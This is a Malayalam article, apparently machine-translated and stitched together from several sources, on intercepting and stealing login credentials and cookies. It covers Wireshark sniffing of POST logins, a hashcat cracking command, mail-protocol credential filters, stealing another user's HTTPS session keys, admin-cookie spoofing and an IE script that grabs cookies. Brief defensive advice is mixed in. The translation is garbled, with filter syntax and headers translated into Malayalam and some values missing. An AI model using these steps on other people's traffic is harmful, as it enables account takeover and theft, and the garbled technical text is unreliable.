കുക്കികൾ മോഷ്ടിക്കാനുള്ള എളുപ്പവഴി. കുക്കികൾ മോഷ്ടിക്കുന്നതിനുള്ള രീതികൾ കുക്കികളെ എങ്ങനെ തടസ്സപ്പെടുത്താം

അടച്ച ഇന്റർനെറ്റ് റിസോഴ്‌സിൽ രജിസ്റ്റർ ചെയ്യുമ്പോഴോ അംഗീകാരം നൽകുമ്പോഴോ ഒരു ലോഗിൻ, പാസ്‌വേഡ് എന്നിവ പൂരിപ്പിച്ച് ENTER അമർത്തുന്നതിലൂടെ, ഈ ഡാറ്റ എളുപ്പത്തിൽ തടസ്സപ്പെടുത്താൻ കഴിയുമെന്ന് പല ഉപയോക്താക്കളും മനസ്സിലാക്കുന്നില്ല. മിക്കപ്പോഴും അവ സുരക്ഷിതമല്ലാത്ത രൂപത്തിൽ നെറ്റ്‌വർക്കിലൂടെ കൈമാറ്റം ചെയ്യപ്പെടുന്നു. അതിനാൽ, നിങ്ങൾ ലോഗിൻ ചെയ്യാൻ ശ്രമിക്കുന്ന സൈറ്റ് HTTP പ്രോട്ടോക്കോൾ ഉപയോഗിക്കുന്നുവെങ്കിൽ, ഈ ട്രാഫിക്ക് ക്യാപ്‌ചർ ചെയ്യാനും Wireshark ഉപയോഗിച്ച് വിശകലനം ചെയ്യാനും തുടർന്ന് പ്രത്യേക ഫിൽട്ടറുകളും പ്രോഗ്രാമുകളും ഉപയോഗിച്ച് പാസ്‌വേഡ് കണ്ടെത്താനും ഡീക്രിപ്റ്റ് ചെയ്യാനും വളരെ എളുപ്പമാണ്.

പാസ്‌വേഡുകൾ തടസ്സപ്പെടുത്തുന്നതിനുള്ള ഏറ്റവും നല്ല സ്ഥലം നെറ്റ്‌വർക്കിന്റെ കാതലാണ്, അവിടെ എല്ലാ ഉപയോക്താക്കളുടെയും ട്രാഫിക് അടച്ച ഉറവിടങ്ങളിലേക്കോ (ഉദാഹരണത്തിന്, മെയിൽ) അല്ലെങ്കിൽ ഇന്റർനെറ്റ് ആക്‌സസ് ചെയ്യുന്നതിനായി റൂട്ടറിന് മുന്നിലോ, ബാഹ്യ ഉറവിടങ്ങളിൽ രജിസ്റ്റർ ചെയ്യുമ്പോൾ. ഞങ്ങൾ ഒരു കണ്ണാടി സ്ഥാപിച്ചു, ഞങ്ങൾ ഒരു ഹാക്കറെ പോലെ തോന്നാൻ തയ്യാറാണ്.

ഘട്ടം 1. ട്രാഫിക് പിടിച്ചെടുക്കാൻ വയർഷാർക്ക് ഇൻസ്റ്റാൾ ചെയ്ത് സമാരംഭിക്കുക

ചിലപ്പോൾ, ഇത് ചെയ്യുന്നതിന്, ട്രാഫിക് ക്യാപ്‌ചർ ചെയ്യാൻ ഞങ്ങൾ ഉദ്ദേശിക്കുന്ന ഇന്റർഫേസ് മാത്രം തിരഞ്ഞെടുത്ത് ആരംഭ ബട്ടൺ ക്ലിക്കുചെയ്യുക. ഞങ്ങളുടെ കാര്യത്തിൽ, ഞങ്ങൾ ഒരു വയർലെസ് നെറ്റ്‌വർക്കിലൂടെ ക്യാപ്‌ചർ ചെയ്യുന്നു.

ട്രാഫിക് പിടിച്ചെടുക്കൽ ആരംഭിച്ചു.

ഘട്ടം 2. ക്യാപ്‌ചർ ചെയ്‌ത POST ട്രാഫിക് ഫിൽട്ടറിംഗ്

ഞങ്ങൾ ബ്രൗസർ തുറന്ന് ഒരു ഉപയോക്തൃനാമവും പാസ്‌വേഡും ഉപയോഗിച്ച് ഏതെങ്കിലും ഉറവിടത്തിലേക്ക് ലോഗിൻ ചെയ്യാൻ ശ്രമിക്കുന്നു. അംഗീകാര പ്രക്രിയ പൂർത്തിയാകുകയും സൈറ്റ് തുറക്കുകയും ചെയ്തുകഴിഞ്ഞാൽ, ഞങ്ങൾ വയർഷാർക്കിലെ ട്രാഫിക്ക് ക്യാപ്‌ചർ ചെയ്യുന്നത് നിർത്തുന്നു. അടുത്തതായി, പ്രോട്ടോക്കോൾ അനലൈസർ തുറന്ന് ധാരാളം പാക്കറ്റുകൾ കാണുക. അടുത്തതായി എന്തുചെയ്യണമെന്ന് അറിയാത്തതിനാൽ മിക്ക ഐടി പ്രൊഫഷണലുകളും ഉപേക്ഷിക്കുന്നത് ഇവിടെയാണ്. എന്നാൽ സ്‌ക്രീനിൽ ഒരു ഫോം പൂരിപ്പിക്കുമ്പോൾ ഞങ്ങളുടെ ലോക്കൽ മെഷീനിൽ സൃഷ്‌ടിക്കുകയും ബ്രൗസറിലെ “ലോഗിൻ” അല്ലെങ്കിൽ “അംഗീകാരം” ബട്ടണിൽ ക്ലിക്കുചെയ്യുമ്പോൾ റിമോട്ട് സെർവറിലേക്ക് അയയ്ക്കുകയും ചെയ്യുന്ന POST ഡാറ്റ അടങ്ങിയിരിക്കുന്ന നിർദ്ദിഷ്ട പാക്കേജുകൾ ഞങ്ങൾക്കറിയാം, അതിൽ താൽപ്പര്യമുണ്ട്.

പിടിച്ചെടുത്ത പാക്കറ്റുകൾ പ്രദർശിപ്പിക്കുന്നതിന് ഞങ്ങൾ വിൻഡോയിൽ ഒരു പ്രത്യേക ഫിൽട്ടർ നൽകുന്നു: http.അഭ്യർത്ഥന.രീതി == "പോസ്റ്റ്"

ആയിരക്കണക്കിന് പാക്കേജുകൾക്ക് പകരം, നമ്മൾ തിരയുന്ന ഡാറ്റയുള്ള ഒന്ന് മാത്രം.

ഘട്ടം 3. ഉപയോക്താവിന്റെ പ്രവേശനവും പാസ്‌വേഡും കണ്ടെത്തുക

വേഗത്തിൽ വലത്-ക്ലിക്കുചെയ്ത് മെനുവിൽ നിന്ന് ഇനം തിരഞ്ഞെടുക്കുക ടിസിപി സ്റ്റീം പിന്തുടരുക


ഇതിനുശേഷം, കോഡിലെ പേജിന്റെ ഉള്ളടക്കങ്ങൾ പുനഃസ്ഥാപിക്കുന്ന ഒരു പുതിയ വിൻഡോയിൽ ടെക്സ്റ്റ് ദൃശ്യമാകും. പാസ്‌വേഡിനും ഉപയോക്തൃനാമത്തിനും അനുയോജ്യമായ “പാസ്‌വേഡ്”, “ഉപയോക്താവ്” എന്നീ ഫീൽഡുകൾ നമുക്ക് കണ്ടെത്താം. ചില സാഹചര്യങ്ങളിൽ, രണ്ട് ഫീൽഡുകളും എളുപ്പത്തിൽ വായിക്കാനും എൻക്രിപ്റ്റ് ചെയ്യപ്പെടാനും കഴിയില്ല, എന്നാൽ Mail.ru, Facebook, VKontakte മുതലായവ പോലുള്ള വളരെ അറിയപ്പെടുന്ന ഉറവിടങ്ങൾ ആക്സസ് ചെയ്യുമ്പോൾ ഞങ്ങൾ ട്രാഫിക് പിടിച്ചെടുക്കാൻ ശ്രമിക്കുകയാണെങ്കിൽ, പാസ്വേഡ് എൻക്രിപ്റ്റ് ചെയ്യും:

HTTP/1.1 302 കണ്ടെത്തി

സെർവർ: Apache/2.2.15 (CentOS)

X-Powered-by: PHP/5.3.3

P3P: CP="NOI ADM DEV PSAi COM NAV ഞങ്ങളുടെ OTRo STP IND DEM"

സെറ്റ്-കുക്കി: പാസ്‌വേഡ്= ; കാലഹരണപ്പെടുന്നു=വ്യാഴം, 07-നവംബർ-2024 23:52:21 GMT; പാത =/

സ്ഥാനം: loggedin.php

ഉള്ളടക്ക ദൈർഘ്യം: 0

കണക്ഷൻ: അടയ്ക്കുക

ഉള്ളടക്ക-തരം: വാചകം/html; അക്ഷരഗണം=UTF-8

അതിനാൽ, ഞങ്ങളുടെ കാര്യത്തിൽ:

ഉപയോക്തൃനാമം: നെറ്റ്വർക്ക്ഗുരു

Password:

ഘട്ടം 4. പാസ്‌വേഡ് ഡീക്രിപ്റ്റ് ചെയ്യുന്നതിനുള്ള എൻകോഡിംഗ് തരം നിർണ്ണയിക്കുക

ഉദാഹരണത്തിന്, http://www.onlinehashcrack.com/hash-identification.php#res എന്ന വെബ്‌സൈറ്റിലേക്ക് പോയി തിരിച്ചറിയൽ വിൻഡോയിൽ ഞങ്ങളുടെ പാസ്‌വേഡ് നൽകുക. മുൻഗണനാ ക്രമത്തിൽ എൻകോഡിംഗ് പ്രോട്ടോക്കോളുകളുടെ ഒരു ലിസ്റ്റ് എനിക്ക് നൽകി:

ഘട്ടം 5. ഉപയോക്തൃ പാസ്‌വേഡ് ഡീക്രിപ്റ്റ് ചെയ്യുന്നു

ഈ ഘട്ടത്തിൽ നമുക്ക് ഹാഷ്കാറ്റ് യൂട്ടിലിറ്റി ഉപയോഗിക്കാം:

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

ഔട്ട്‌പുട്ടിൽ ഞങ്ങൾക്ക് ഒരു ഡീക്രിപ്റ്റ് ചെയ്ത പാസ്‌വേഡ് ലഭിച്ചു: ലളിതമായ പാസ്‌വേഡ്

അതിനാൽ, വയർഷാർക്കിന്റെ സഹായത്തോടെ, ആപ്ലിക്കേഷനുകളുടെയും സേവനങ്ങളുടെയും പ്രവർത്തനത്തിലെ പ്രശ്നങ്ങൾ പരിഹരിക്കുക മാത്രമല്ല, വെബ് ഫോമുകളിൽ ഉപയോക്താക്കൾ നൽകുന്ന പാസ്‌വേഡുകൾ തടസ്സപ്പെടുത്തുകയും ഒരു ഹാക്കറായി സ്വയം ശ്രമിക്കുകയും ചെയ്യാം. പ്രദർശിപ്പിക്കുന്നതിന് ലളിതമായ ഫിൽട്ടറുകൾ ഉപയോഗിച്ച് നിങ്ങൾക്ക് ഉപയോക്തൃ മെയിൽബോക്സുകൾക്കുള്ള പാസ്വേഡുകൾ കണ്ടെത്താനും കഴിയും:

  • POP പ്രോട്ടോക്കോളും ഫിൽട്ടറും ഇതുപോലെ കാണപ്പെടുന്നു: pop.request.command == "USER" || pop.request.command == "പാസ്"
  • IMAP പ്രോട്ടോക്കോളും ഫിൽട്ടറും ഇതായിരിക്കും: imap.request ൽ "ലോഗിൻ" അടങ്ങിയിരിക്കുന്നു
  • പ്രോട്ടോക്കോൾ SMTP ആണ്, നിങ്ങൾ ഇനിപ്പറയുന്ന ഫിൽട്ടർ നൽകേണ്ടതുണ്ട്: smtp.req.command == "AUTH"

എൻകോഡിംഗ് പ്രോട്ടോക്കോൾ ഡീക്രിപ്റ്റ് ചെയ്യുന്നതിനുള്ള കൂടുതൽ ഗുരുതരമായ യൂട്ടിലിറ്റികളും.

ഘട്ടം 6: ട്രാഫിക് എൻക്രിപ്റ്റ് ചെയ്യുകയും HTTPS ഉപയോഗിക്കുകയും ചെയ്താലോ?

ഈ ചോദ്യത്തിന് ഉത്തരം നൽകാൻ നിരവധി ഓപ്ഷനുകൾ ഉണ്ട്.

ഓപ്ഷൻ 1. ഉപയോക്താവും സെർവറും തമ്മിലുള്ള കണക്ഷൻ തകരാറിലാകുമ്പോൾ കണക്റ്റുചെയ്യുക, കണക്ഷൻ സ്ഥാപിച്ച നിമിഷത്തിൽ ട്രാഫിക്ക് പിടിച്ചെടുക്കുക (SSL ഹാൻഡ്‌ഷേക്ക്). ഒരു കണക്ഷൻ സ്ഥാപിക്കുമ്പോൾ, സെഷൻ കീ തടസ്സപ്പെടുത്താൻ കഴിയും.

ഓപ്ഷൻ 2: Firefox അല്ലെങ്കിൽ Chrome റെക്കോർഡ് ചെയ്ത സെഷൻ കീ ലോഗ് ഫയൽ ഉപയോഗിച്ച് നിങ്ങൾക്ക് HTTPS ട്രാഫിക് ഡീക്രിപ്റ്റ് ചെയ്യാം. ഇത് ചെയ്യുന്നതിന്, ഈ എൻക്രിപ്ഷൻ കീകൾ ഒരു ലോഗ് ഫയലിലേക്ക് (ഫയർഫോക്സ് അടിസ്ഥാനമാക്കിയുള്ള ഉദാഹരണം) എഴുതാൻ ബ്രൗസർ കോൺഫിഗർ ചെയ്തിരിക്കണം, നിങ്ങൾക്ക് ആ ലോഗ് ഫയൽ ലഭിക്കും. അടിസ്ഥാനപരമായി, നിങ്ങൾ മറ്റൊരു ഉപയോക്താവിന്റെ ഹാർഡ് ഡ്രൈവിൽ നിന്ന് സെഷൻ കീ ഫയൽ മോഷ്ടിക്കേണ്ടതുണ്ട് (അത് നിയമവിരുദ്ധമാണ്). ശരി, ട്രാഫിക് ക്യാപ്‌ചർ ചെയ്‌ത് ഡീക്രിപ്റ്റ് ചെയ്യാൻ തത്ഫലമായുണ്ടാകുന്ന കീ ഉപയോഗിക്കുക.

വ്യക്തത.ഒരു വ്യക്തിയുടെ പാസ്‌വേഡ് മോഷ്ടിക്കാൻ ശ്രമിക്കുന്ന വെബ് ബ്രൗസറിനെ കുറിച്ചാണ് നമ്മൾ സംസാരിക്കുന്നത്. ഞങ്ങളുടെ സ്വന്തം HTTPS ട്രാഫിക്കിനെ ഡീക്രിപ്റ്റ് ചെയ്യുകയും പരിശീലിക്കാൻ ആഗ്രഹിക്കുകയും ചെയ്യുന്നുവെങ്കിൽ, ഈ തന്ത്രം പ്രവർത്തിക്കും. മറ്റ് ഉപയോക്താക്കളുടെ കമ്പ്യൂട്ടറുകളിലേക്ക് ആക്‌സസ് ഇല്ലാതെ HTTPS ട്രാഫിക് ഡീക്രിപ്റ്റ് ചെയ്യാൻ നിങ്ങൾ ശ്രമിക്കുകയാണെങ്കിൽ, ഇത് പ്രവർത്തിക്കില്ല - അതാണ് എൻക്രിപ്ഷനും സ്വകാര്യതയും.

ഓപ്ഷൻ 1 അല്ലെങ്കിൽ 2 അനുസരിച്ച് കീകൾ ലഭിച്ച ശേഷം, നിങ്ങൾ അവ വയർഷാർക്കിൽ രജിസ്റ്റർ ചെയ്യേണ്ടതുണ്ട്:

  1. മെനുവിലേക്ക് പോകുക എഡിറ്റ് - മുൻഗണനകൾ - പ്രോട്ടോക്കോളുകൾ - എസ്എസ്എൽ.
  2. "ഒന്നിലധികം TCP സെഗ്‌മെന്റുകളിൽ വ്യാപിച്ചുകിടക്കുന്ന SSL റെക്കോർഡുകൾ വീണ്ടും കൂട്ടിച്ചേർക്കുക" എന്ന ഫ്ലാഗ് സജ്ജമാക്കുക.
  3. "RSA കീകളുടെ ലിസ്റ്റ്" കൂടാതെ എഡിറ്റ് ക്ലിക്ക് ചെയ്യുക.
  4. എല്ലാ ഫീൽഡുകളിലും ഡാറ്റ നൽകുക, കീ ഉപയോഗിച്ച് ഫയലിലെ പാത്ത് എഴുതുക

കുക്കിയിൽ wordpress_logged_in_263d663a02379b7624b1028a58464038=admin എന്ന വരി അടങ്ങിയിട്ടുണ്ടെന്ന് ചിത്രം കാണിക്കുന്നു. ഈ മൂല്യം കുക്കിയിൽ എൻക്രിപ്റ്റ് ചെയ്യാത്ത രൂപത്തിലാണ്, അക്കില്ലസ് യൂട്ടിലിറ്റി ഉപയോഗിച്ച് എളുപ്പത്തിൽ തടസ്സപ്പെടുത്താം, എന്നാൽ മിക്ക കേസുകളിലും അക്കില്ലസിൽ നിങ്ങൾക്ക് ഒരു പ്രത്യേക എൻട്രിയുടെ ഹാഷ് മാത്രമേ കാണാനാകൂ. സെർവറിലേക്ക് അഭ്യർത്ഥന അയയ്‌ക്കുന്നതിന് മുമ്പ്, നിങ്ങൾക്ക് ഈ ലൈൻ സമാനമായ ഏതെങ്കിലും ഒന്ന് ഉപയോഗിച്ച് മാറ്റിസ്ഥാപിക്കാൻ ശ്രമിക്കാം (ഈ സാഹചര്യത്തിൽ കാര്യമൊന്നുമില്ലെങ്കിലും) - ശ്രമങ്ങളുടെ എണ്ണം പരിമിതമല്ല. തുടർന്ന്, അയയ്‌ക്കുക ബട്ടൺ ഉപയോഗിച്ച് സെർവറിലേക്ക് ഈ അഭ്യർത്ഥന അയയ്‌ക്കുന്നതിലൂടെ, അഡ്മിനിസ്ട്രേറ്റർക്കായി ഉദ്ദേശിച്ചിട്ടുള്ള സെർവറിൽ നിന്ന് നിങ്ങൾക്ക് ഒരു പ്രതികരണം ലഭിക്കും.

മുമ്പത്തെ ഉദാഹരണത്തിൽ, നിങ്ങൾക്ക് നേരിട്ടുള്ള ഉപയോക്തൃ ഐഡി സ്പൂഫിംഗ് ഉപയോഗിക്കാം. കൂടാതെ, പാരാമീറ്ററിന്റെ പേര്, അതിന്റെ മൂല്യം പകരം വയ്ക്കുന്നത് ഹാക്കർക്കുള്ള അധിക അവസരങ്ങൾ, ഇനിപ്പറയുന്നവ ആകാം: ഉപയോക്താവ് (ഉദാഹരണത്തിന്, USER=JDOE), ഒരു ഐഡി സ്ട്രിംഗ് ഉള്ള ഏത് പദപ്രയോഗവും (ഉദാഹരണത്തിന്, USER=JDOE അല്ലെങ്കിൽ SESSIONID= BLAHBLAH), അഡ്മിൻ (ഉദാഹരണത്തിന്, ADMIN= TRUE), സെഷൻ (ഉദാഹരണത്തിന്, SESSION=ACTIVE), കാർട്ട് (ഉദാഹരണത്തിന്, CART=FULL), അതുപോലെ TRUE, FALSE, ACTIVE, INACTIVE തുടങ്ങിയ പദപ്രയോഗങ്ങളും. സാധാരണയായി, കുക്കികളുടെ ഫോർമാറ്റ് അവ ഉപയോഗിക്കുന്ന ആപ്ലിക്കേഷനെ ആശ്രയിച്ചിരിക്കുന്നു. എന്നിരുന്നാലും, കുക്കികൾ ഉപയോഗിച്ച് ആപ്ലിക്കേഷൻ പിഴവുകൾ കണ്ടെത്തുന്നതിനുള്ള ഈ നുറുങ്ങുകൾ മിക്കവാറും എല്ലാ ഫോർമാറ്റുകൾക്കും ബാധകമാണ്.

കുക്കി എക്‌സ്‌ട്രാക്‌ഷനെതിരെയുള്ള ഉപഭോക്തൃ പക്ഷത്തെ പ്രതിരോധ നടപടികൾ

പൊതുവേ, ആധികാരികത ഉറപ്പാക്കാനും സെൻസിറ്റീവ് ഡാറ്റ സംഭരിക്കാനും കുക്കികൾ ഉപയോഗിക്കുന്ന വെബ്‌സൈറ്റുകളെ കുറിച്ച് ഉപയോക്താക്കൾ ജാഗ്രത പാലിക്കണം. പ്രാമാണീകരണത്തിനായി കുക്കികൾ ഉപയോഗിക്കുന്ന ഒരു വെബ്‌സൈറ്റ് ഉപയോക്തൃനാമവും പാസ്‌വേഡും എൻക്രിപ്റ്റ് ചെയ്യുന്നതിന് കുറഞ്ഞത് SSL പ്രോട്ടോക്കോളിനെയെങ്കിലും പിന്തുണയ്‌ക്കേണ്ടതുണ്ടെന്നതും ഓർമ്മിക്കേണ്ടതാണ്, കാരണം ഈ പ്രോട്ടോക്കോളിന്റെ അഭാവത്തിൽ, ഡാറ്റ എൻക്രിപ്റ്റ് ചെയ്യാതെ കൈമാറുന്നു, അത് തടസ്സപ്പെടുത്തുന്നത് സാധ്യമാക്കുന്നു. നെറ്റ്‌വർക്കിലൂടെ അയയ്‌ക്കുന്ന ഡാറ്റ കാണുന്നതിന് ലളിതമായ സോഫ്റ്റ്‌വെയർ ടൂളുകൾ ഉപയോഗിക്കുന്നു.

കുക്കികളുടെ ഉപയോഗം സുഗമമാക്കുന്നതിന് കൂകബുറ സോഫ്റ്റ്‌വെയർ ഒരു ടൂൾ വികസിപ്പിച്ചെടുത്തിട്ടുണ്ട്. ഉപകരണത്തെ കുക്കിപാൽ ( http://www.kburra.com/cpal.html (www.kburra.com കാണുക)). ഒരു വെബ്‌സൈറ്റ് മെഷീനിൽ ഒരു കുക്കി ഇൻസ്റ്റാൾ ചെയ്യാൻ ശ്രമിക്കുമ്പോൾ ഉപയോക്താവിന് മുന്നറിയിപ്പ് നൽകുന്നതിനാണ് ഈ പ്രോഗ്രാം രൂപകൽപ്പന ചെയ്‌തിരിക്കുന്നത്, കൂടാതെ ഉപയോക്താവിന് ഈ പ്രവർത്തനം അനുവദിക്കാനോ നിരസിക്കാനോ കഴിയും. സമാനമായ കുക്കി തടയൽ പ്രവർത്തനങ്ങൾ ഇന്ന് എല്ലാ ബ്രൗസറുകളിലും ലഭ്യമാണ്.

വെബ് ബ്രൗസർ അപ്‌ഡേറ്റുകൾ പതിവായി ഇൻസ്റ്റാൾ ചെയ്യുന്നതിനുള്ള മറ്റൊരു കാരണം, ഈ പ്രോഗ്രാമുകളിലെ സുരക്ഷാ പിഴവുകൾ നിരന്തരം തിരിച്ചറിയപ്പെടുന്നു എന്നതാണ്. അതിനാൽ, ബെന്നറ്റ് ഹാസൽട്ടണും ജാമി മക്കാർത്തിയും ഒരു സ്ക്രിപ്റ്റ് സൃഷ്ടിച്ചു, അത് ഒരു ലിങ്കിൽ ക്ലിക്ക് ചെയ്ത ശേഷം, ക്ലയന്റ് മെഷീനിൽ നിന്ന് കുക്കികൾ വീണ്ടെടുക്കുന്നു. തൽഫലമായി, ഉപയോക്താവിന്റെ മെഷീനിലുള്ള കുക്കികളുടെ എല്ലാ ഉള്ളടക്കങ്ങളും ലഭ്യമാകും.

ഹാൻഡിൽ ഉപയോഗിച്ചും ഇത്തരത്തിലുള്ള ഹാക്ക് ചെയ്യാവുന്നതാണ്

അത്തരം കാര്യങ്ങൾ ഞങ്ങളുടെ സ്വകാര്യ ഡാറ്റയെ ഭീഷണിപ്പെടുത്തുന്നില്ലെന്ന് ഉറപ്പാക്കാൻ, ഞാൻ ഇത് സ്വയം ചെയ്യുകയും HTML കോഡ് (ഇ-മെയിൽ ക്ലയന്റുകൾ, മീഡിയ പ്ലെയറുകൾ, ബ്രൗസറുകൾ മുതലായവ) ഉപയോഗിച്ച് പ്രവർത്തിക്കുന്ന സോഫ്റ്റ്‌വെയർ എപ്പോഴും അപ്‌ഡേറ്റ് ചെയ്യാൻ എല്ലാവരേയും ഉപദേശിക്കുകയും ചെയ്യുന്നു.

പലരും കുക്കികൾ തടയാൻ ഇഷ്ടപ്പെടുന്നു, എന്നാൽ മിക്ക വെബ്‌സൈറ്റുകളിലും കുക്കികൾ ബ്രൗസ് ചെയ്യേണ്ടത് ആവശ്യമാണ്. ഉപസംഹാരം - സമീപഭാവിയിൽ കുക്കികൾ ഇല്ലാതെ ചെയ്യാൻ നിങ്ങളെ അനുവദിക്കുന്ന ഒരു നൂതന സാങ്കേതികവിദ്യ ദൃശ്യമാകുകയാണെങ്കിൽ, പ്രോഗ്രാമർമാരും അഡ്മിനിസ്ട്രേറ്റർമാരും ആശ്വാസത്തിന്റെ നെടുവീർപ്പ് ശ്വസിക്കും, എന്നാൽ ഇപ്പോൾ കുക്കികൾ ഒരു ഹാക്കർക്ക് ഒരു രുചികരമായ മോർസലായി തുടരും! ഇത് ശരിയാണ്, കാരണം ഒരു മികച്ച ബദൽ ഇതുവരെ നിലവിലില്ല.

സെർവർ സൈഡ് പ്രതിരോധ നടപടികൾ

സെർവർ സുരക്ഷ ഉറപ്പാക്കുന്നതിനുള്ള ശുപാർശകളുടെ കാര്യത്തിൽ, വിദഗ്ധർ ഒരു ലളിതമായ ഉപദേശം നൽകുന്നു: തീർത്തും ആവശ്യമില്ലെങ്കിൽ കുക്കി സംവിധാനം ഉപയോഗിക്കരുത്! ആശയവിനിമയ സെഷൻ അവസാനിച്ചതിന് ശേഷവും ഉപയോക്താവിന്റെ സിസ്റ്റത്തിൽ ശേഷിക്കുന്ന കുക്കികൾ ഉപയോഗിക്കുമ്പോൾ പ്രത്യേകം ശ്രദ്ധിക്കേണ്ടതുണ്ട്.

തീർച്ചയായും, ഉപയോക്തൃ പ്രാമാണീകരണത്തിനായി വെബ് സെർവറുകൾക്ക് സുരക്ഷ നൽകാൻ കുക്കികൾ ഉപയോഗിക്കാമെന്ന് മനസ്സിലാക്കേണ്ടത് പ്രധാനമാണ്. നിങ്ങളുടെ ആപ്ലിക്കേഷന് കുക്കികൾ ഉപയോഗിക്കേണ്ടതുണ്ടെങ്കിൽ, ഓരോ സെഷനും വ്യത്യസ്ത ഹ്രസ്വകാല കീകൾ ഉപയോഗിക്കുന്നതിന് നിങ്ങൾ കുക്കി മെക്കാനിസം കോൺഫിഗർ ചെയ്യണം, കൂടാതെ ഹാക്കർമാർ ഹാക്കിംഗിനായി ഉപയോഗിക്കാവുന്ന വിവരങ്ങൾ ഈ ഫയലുകളിൽ ഉൾപ്പെടുത്താതിരിക്കാൻ ശ്രമിക്കുക (അഡ്മിൻ=ട്രൂ പോലുള്ളവ) .

കൂടാതെ, നിങ്ങളുടെ കുക്കികളുടെ ഉപയോഗം കൂടുതൽ സുരക്ഷിതമാക്കാൻ, തന്ത്രപ്രധാനമായ വിവരങ്ങൾ എക്‌സ്‌ട്രാക്‌റ്റുചെയ്യുന്നത് തടയാൻ നിങ്ങൾക്ക് കുക്കി എൻക്രിപ്ഷൻ ഉപയോഗിക്കാം. തീർച്ചയായും, കുക്കി സാങ്കേതികവിദ്യയിൽ പ്രവർത്തിക്കുമ്പോൾ എൻക്രിപ്ഷൻ എല്ലാ സുരക്ഷാ പ്രശ്നങ്ങളും പരിഹരിക്കില്ല, എന്നാൽ ഈ രീതി മുകളിൽ വിവരിച്ച ഏറ്റവും അടിസ്ഥാനപരമായ ഹാക്കുകൾ തടയും.

എന്താണ് കുക്കി?

ഉപയോക്താവിന്റെ കമ്പ്യൂട്ടറിൽ ചില ടെക്‌സ്‌റ്റ് വിവരങ്ങൾ സേവ് ചെയ്‌ത് അത് ആക്‌സസ് ചെയ്യാൻ http സെർവറിനെ അനുവദിക്കുന്ന ഒരു മെക്കാനിസം ഉണ്ട്. ഈ വിവരങ്ങളെ കുക്കി എന്ന് വിളിക്കുന്നു. അടിസ്ഥാനപരമായി, ഓരോ കുക്കിയും ഒരു ജോഡിയാണ്: ഒരു പാരാമീറ്ററിന്റെ പേരും അതിന്റെ മൂല്യവും. ഓരോ കുക്കിയും അത് ഉൾപ്പെടുന്ന ഡൊമെയ്‌നും നൽകിയിരിക്കുന്നു. സുരക്ഷാ കാരണങ്ങളാൽ, എല്ലാ ബ്രൗസറുകളിലും http സെർവറിന് അതിന്റെ ഡൊമെയ്‌നിന്റെ കുക്കി ആക്‌സസ് ചെയ്യാൻ മാത്രമേ അനുവാദമുള്ളൂ. കൂടാതെ, കുക്കികൾക്ക് ഒരു കാലഹരണ തീയതി ഉണ്ടായിരിക്കാം, ഈ സാഹചര്യത്തിൽ നിങ്ങൾ എല്ലാ ബ്രൗസർ വിൻഡോകളും അടച്ചാലും ഈ തീയതി വരെ അവ കമ്പ്യൂട്ടറിൽ സൂക്ഷിക്കും.


എന്തുകൊണ്ടാണ് കുക്കികൾ പ്രധാനമായിരിക്കുന്നത്?

എല്ലാ മൾട്ടി-യൂസർ സിസ്റ്റങ്ങളും ഉപയോക്താവിനെ തിരിച്ചറിയാൻ കുക്കികൾ ഉപയോഗിക്കുന്നു. കൂടുതൽ കൃത്യമായി പറഞ്ഞാൽ, സേവനത്തിലേക്കുള്ള ഉപയോക്താവിന്റെ നിലവിലെ കണക്ഷൻ, ഉപയോക്തൃ സെഷൻ. ആരെങ്കിലും നിങ്ങളുടെ കുക്കികൾ തിരിച്ചറിയുകയാണെങ്കിൽ, നിങ്ങളുടെ പേരിൽ അവർക്ക് സിസ്റ്റത്തിലേക്ക് ലോഗിൻ ചെയ്യാൻ കഴിയും. കാരണം ഇപ്പോൾ വളരെ കുറച്ച് ഇന്റർനെറ്റ് ഉറവിടങ്ങൾ ഒരു ഉപയോക്തൃ സെഷനിൽ IP വിലാസ മാറ്റങ്ങൾ പരിശോധിക്കുന്നു.


കുക്കികൾ എങ്ങനെ മാറ്റാം അല്ലെങ്കിൽ മാറ്റിസ്ഥാപിക്കാം?

കുക്കികൾ എഡിറ്റുചെയ്യുന്നതിന് ബ്രൗസർ ഡെവലപ്പർമാർ അന്തർനിർമ്മിത ഉപകരണങ്ങൾ നൽകുന്നില്ല. എന്നാൽ നിങ്ങൾക്ക് ഒരു സാധാരണ നോട്ട്പാഡ് ഉപയോഗിച്ച് പോകാം.


ഘട്ടം 1: ടെക്‌സ്‌റ്റ് ഉപയോഗിച്ച് ഒരു ടെക്‌സ്‌റ്റ് ഫയൽ സൃഷ്‌ടിക്കുക

വിൻഡോസ് രജിസ്ട്രി എഡിറ്റർ പതിപ്പ് 5.00



@="C:\\IE_ext.htm"

IE_ext.reg എന്ന പേരിൽ ഇത് സേവ് ചെയ്യുക

ഘട്ടം 2: സൃഷ്ടിച്ച ഫയൽ ഉപയോഗിച്ച്, വിൻഡോസ് രജിസ്ട്രിയിൽ മാറ്റങ്ങൾ ചേർക്കുക.

ഘട്ടം 3: ടെക്‌സ്‌റ്റ് ഉപയോഗിച്ച് ഒരു ടെക്‌സ്‌റ്റ് ഫയൽ സൃഷ്‌ടിക്കുക

< script language="javascript">
external.menuArguments.clipboardData.setData("ടെക്സ്റ്റ്" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
മുന്നറിയിപ്പ് (external.menuArguments.document.cookie);


C:\IE_ext.htm എന്ന പേരിൽ ഇത് സേവ് ചെയ്യുക

ഘട്ടം 4: ഞങ്ങൾ താൽപ്പര്യമുള്ള വെബ്സൈറ്റിലേക്ക് പോകുന്നു.

ഘട്ടം 5: പേജിലെ ശൂന്യമായ സ്ഥലത്ത് വലത്-ക്ലിക്കുചെയ്ത് മെനു ഇനം തിരഞ്ഞെടുക്കുക "കുക്കികളുമായി പ്രവർത്തിക്കുന്നു". ക്ലിപ്പ്ബോർഡിലേക്ക് ആക്സസ് അനുവദിക്കുക. ഈ സൈറ്റിൽ നിന്നുള്ള നിങ്ങളുടെ കുക്കികൾ ക്ലിപ്പ്ബോർഡിലേക്ക് പോകും. നിങ്ങൾക്ക് അവരുടെ നോട്ട്പാഡ് തിരുകുകയും നോക്കുകയും ചെയ്യാം.


